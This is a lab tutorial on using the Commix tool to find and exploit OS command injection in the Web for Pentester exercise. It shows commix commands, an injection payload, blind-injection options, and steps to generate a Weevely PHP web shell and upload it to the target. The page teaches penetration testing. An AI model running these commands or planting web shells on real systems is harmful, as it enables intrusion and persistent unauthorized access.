Categories: Exploitation Tools

Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, by web developers, penetration testers, or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. It is written in Python programming language.

Requirements and Installation

Requires version 2.6.x and above to run this tool, it can be downloaded from the GitHub.

root@kali:~# git clone https://github.com/commixproject/commix.git

Also, can be installed through Ubuntu’s APT (Advanced Packaging Tool)

root@kali:~# apt-get install commix

Supported Platforms

  • Linux
  • Mac OS X
  • Windows (experimental)

Classic Injection

Step1: Download and mount the Pentester lab exercise Web for Pentester and then you can reach the labs from your Kali machine browser Ex: http://192.168.169.130

Step 2: You can find command line Injection exercises.

Commix – Automated All-in-One OS Command Injection and Exploitation ToolCommix – Automated All-in-One OS Command Injection and Exploitation Tool

Step 3: Now in Kali type commix and copy the path for example 1.

INJECT_HERE – It will try to inject various queries here.

root@kali:~# commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE”
                                                            Injection attack

It checks for various payloads and successful with Payload: ;echo WIBYAT$((24+78))$(echo WIBYAT)WIBYAT.

Then it asks to connect with a terminal shell Do you want a Pseudo-Terminal shell? [Y/n/q] > By pressing “y” we can get the terminal access for the machine.

Blind Injection

commix –url=”http://192.168.169.130/commandexec/example1.php?ip=127.0.0.1″ –os=U –technique=”tf” -v 1
                                                    Blind Injection

Injecting Weevely PHP web shell

Step 1: Create a payload with weevely, if weevely is not installed you can use apt-get install weevely.

Step 2: Launch weevely and generate a PHP web shell.

root@kali:~# weevely root@kali:~# weevely generate commix /root/Desktop/Commix/shellexploit.php
PHP Shell with Weevely

Step 3: To upload the file in the remote host, use the following command.

–file-write  = File to write in the destination host

–file-dest  = Filepath to write or Upload

commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE” –file-write=’/root/Desktop/Commix/shellexploit.php’ –file-dest=”/var/www/upload/images/”

Also Read:

Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

View Comments

Recent Posts

Brinker Named Among “10 Most Promising Defense Tech Startups of 2025”

Brinker, an innovative narrative intelligence platform dedicated to combating disinformation and influence campaigns, has been…

10 hours ago

Hackers Use DeepSeek and Remote Desktop Apps to Deploy TookPS Malware

A recent investigation by cybersecurity researchers has uncovered a large-scale malware campaign leveraging the DeepSeek…

10 hours ago

SmokeLoader Malware Uses Weaponized 7z Archives to Deliver Infostealers

A recent malware campaign has been observed targeting the First Ukrainian International Bank (PUMB), utilizing…

10 hours ago

New Malware Targets Magic Enthusiasts to Steal Logins

A newly discovered malware, dubbed Trojan.Arcanum, is targeting enthusiasts of tarot, astrology, and other esoteric…

10 hours ago

Hackers Exploit Cloudflare for Advanced Phishing Attacks

A sophisticated phishing campaign orchestrated by a Russian-speaking threat actor has been uncovered, revealing the…

10 hours ago

Over 1,500 PostgreSQL Servers Hit by Fileless Malware Attack

A sophisticated malware campaign has compromised over 1,500 PostgreSQL servers, leveraging fileless techniques to deploy…

10 hours ago